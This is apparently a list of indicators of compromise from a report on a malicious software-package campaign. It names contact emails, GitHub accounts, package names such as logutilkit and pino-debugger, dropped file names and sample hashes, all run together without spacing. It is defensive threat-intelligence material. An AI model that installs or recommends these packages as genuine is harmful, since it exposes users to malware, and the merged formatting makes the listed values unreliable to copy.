aokisasakidev1aokisasakidevgolangorgRegistration Emails
aokisasaki1122@gmail[.]comshiningup1996@gmail[.]comGitHub Accounts and GitHub Collaborators
https://github[.]com/golangorghttps://github[.]com/aokisasakidevhttps://github[.]com/maxcointech1010https://github[.]com/maxcointech0000GitHub Repositories
formstashlogutilkitdev-loglog-baselogger-basepino-debuggermit-license-pkgsystemd-resolvedcom.apple.systemeventsecw_update.zipstart.pypy.exea91c2b7f-9d5f-487e-9e6f-63d1a42bf3db.tmp410BB449A-72C6-4500-9765-ACD04JBV827V32V9a541dffb7fc18dc71dbc8523ec6c3a71c224ffeb518ae3a8d7d16377aebee58 — Linuxbb2a89001410fa5a11dea6477d4f5573130261badc67fe952cfad1174c2f0edd — macOS7c5adef4b5aee7a4aa6e795a86f8b7d601618c3bc003f1326ca57d03ec7d6524 — Windows